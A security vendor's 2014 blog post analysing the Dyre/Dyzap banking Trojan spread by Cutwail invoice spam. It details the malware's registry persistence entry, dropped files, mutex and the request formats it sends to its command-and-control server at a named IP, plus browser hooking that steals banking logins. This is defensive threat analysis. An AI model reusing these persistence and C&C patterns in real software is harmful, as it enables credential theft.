SpiderLabs Blog

Analysis of a New Banking Trojan Spammed by Cutwail

Written by Rodel Mendrez | Jul 2, 2014 1:19:00 PM

The Cutwail spambot has a long history of sending spam with attached malicious files such as Zbot, Blackhole Exploit Kit and Cryptolocker. Another trick in Cutwail's portfolio is to use links pointing to popular file hosting services. Over the past weeks, we have observed spam that claims to be an unpaid invoice from a certain bank.

Influx of Invoice Spam Campaign detected by Trustwave Secure Email Gateway

Currently, one of the most common themes in malicious spam campaigns are around claims of an invoice or product order with either ZIP file attachments or links to a ZIP/RAR file hosted on the web. This high volume campaign contains links to the file sharing services, Dropbox and Cubby. The files hosted are ZIP files with filenames such as invoice_<digit>.zip and document_<digit>.zip.

Malware Payload

After downloading and extracting the malware, we noticed that it uses an Adobe PDF icon to trick users into believing it is a harmless portable document file. When run, the executable file drops a copy of itself in to the Windows %AppData% (application data) directory as googleupdaterr.exe. It then creates an autorun registry to execute itself at Windows startup:

HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\RunGoogleUpdate = "%AppData%\googleupdaterr.exe"

A code stored in the malware's body is then injected to Explorer.exe. It also creates an infection marker in the Explorer.exe process by creating a Mutex named "RangisMutex5"

Antivirus companies have dubbed the loader of this new banking Trojan "Dyranges or Trojan Dyzap," and so has the DLL code injected to explorer.exe. A detection name perhaps taken from a PDB path found in the malware body:

The malware PDB path of a project named DYRE. Interesting fact "zapuskator2.pdb" is a Russian translation of "executer2.pdb"

A configuration file named userdata.dat is then dropped in the %AppData% directory containing the BotID, encrypted configuration and a Boolean variable named "AUTOBACKCONN". We assume that setting AUTOBACKCONN to True enables the persistent connection of the bot to its command and control server.

Right after the malware installation, the Trojan sends the following GET request to its command and control server with the IP address 192.99.6.61. Here's the sequence communication with the server:

  1. The first GET request is the "publickey" request using the format "/cho1017/<botid>/5/publickey/".
  2. The bot then reports the OS version of the infected system to its C&C server using the format "/cho1017/<botid>/0/<Windows Version>/".
  3. Then an unknown GET request "/58/1/ ", after which the C&C server replies back with the ThreadID.

After the initial server handshake, The trojan tries to maintain the connectivity to its server through an ongoing GET request using the format:

GET /cho1017/<botid>/1/<base64 data>/HTTP/1.1User-Agent: Wget/1.9Host: 192.99.6.61

This banking Trojan hooks Google Chrome, Firefox or Internet Explorer browsers. This browser hooking function enables the Trojan to intercept user searches, browser cookies and sensitive banking information.

The Trojan then monitors a list of banking websites. When a victim visits a banking website being monitored, the information entered by the victim is intercepted and sent to the cybercriminal's server. The snippet of code below is the function where the Trojan monitors various banking URLs and where the intercepted data is sent to a remote IP address at port 12081.

The packet capture below shows the POST request intercepted by the Trojan right after log-in to a monitored banking website. The POST data which includes the login credentials and cookies are sent to the cybercriminal's server.

Acting as a man-in-the-middle, the Trojan sends the intercepted POST data to the cybercriminal's IP address. But the data is also sent through the normal SSL encrypted tunnel between the victim's browser and the bank's web server which hides the suspicious activity going on in the background.

As of this writing, the offending IP address is offline. We are not sure if it was taken down or the cybercriminal moved to a different server. But according to our intelligence, the attacker's IP address was linked to an underground drop ship service Global Blackpoint, a service popular for carders (and other scammers). It also hosts various phishing pages targeting banking institutions.

Global Blackpoint Login Panel

To wrap up, we always advise users to be wary when clicking links in emails. Extra scrutiny should be placed on links to common file sharing websites such as Dropbox and Cubby, especially now that cybercriminals have started to utilize them for hosting their malware. Trustwave Secure Email Gateway users are protected from this malicious spam campaign.